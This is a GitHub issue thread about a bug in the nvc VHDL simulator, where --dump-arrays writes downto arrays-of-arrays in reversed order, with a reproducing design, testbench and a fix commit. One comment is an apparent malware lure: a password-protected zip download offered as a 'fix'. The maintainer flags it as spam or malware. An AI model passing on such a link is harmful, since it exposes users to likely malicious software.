nickg/nvc #957: Dump-arrays data is backwards

cameronweston, 2024-08-28:
When using the --dump-arrays option, the data is placed in the wrong index in the array.

test.vhd
```vhd
library ieee;
use ieee.std_logic_1164.all;
use ieee.numeric_std.all;

entity test is
  port (
    clk     : in std_logic;
    dataIn  : in std_logic_vector(15 downto 0);
    sel     : in unsigned(1 downto 0);
    en      : in std_logic
  );
end test;

architecture rtl of test is
  type v_slv_t is array (natural range<>) of std_logic_vector;

  signal test : v_slv_t(2 downto 0)(15 downto 0) := (others => (others => '0'));
begin
test_reg : process (clk)
begin
  if rising_edge(clk) then
    if en then
      test(to_integer(sel)) <= dataIn;
    end if;
  end if;
end process;
end rtl;
```

tb.vhd
```vhdl
library ieee;
use ieee.std_logic_1164.all;
use ieee.numeric_std.all;

entity tb is
end tb;

architecture rtl of tb is
  signal clk_period : time := 20 ns;
  signal clk : std_logic := '0';
  signal dataIn : std_logic_vector(15 downto 0) := (others => '0');
  signal sel : unsigned(1 downto 0) := (others => '0');
  signal en : std_logic := '0';
begin
  clk <= not clk after clk_period / 2;
  uut : entity work.test
    port map(
      clk => clk,
      dataIn => dataIn,
      sel => sel,
      en => en
    );

process
begin
  wait for 100 ns;
  wait until rising_edge(clk);
  dataIn <= std_logic_vector(to_unsigned(16#1111#, dataIn'length));
  sel <= to_unsigned(16#0#, sel'length);
  en <= '1';
  wait until rising_edge(clk);
  en <= '0';

  wait for 100 ns;
  wait until rising_edge(clk);
  dataIn <= std_logic_vector(to_unsigned(16#3333#, dataIn'length));
  sel <= to_unsigned(16#2#, sel'length);
  en <= '1';
  wait until rising_edge(clk);
  en <= '0';

  wait for 100 ns;

  wait until rising_edge(clk);
  dataIn <= std_logic_vector(to_unsigned(16#2222#, dataIn'length));
  sel <= to_unsigned(16#1#, sel'length);
  en <= '1';
  wait until rising_edge(clk);
  en <= '0';

  wait for 100 ns;

  std.env.stop;

end process;

end rtl;
```

Command:
```bash
nvc -a test.vhd tb.vhd -e tb -r --wave=test.fst --dump-arrays
```

[image]

PiaoR, 2024-08-28:
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

nickg, 2024-08-28:
Please ignore the link in the comment from the user above which is presumably spam/malware. I have reported and deleted it.

commit 8f4fd694 (2024-08-28): Dump downto arrays-of-arrays in the correct order. Fixes #957
closed 2024-08-28 by nickg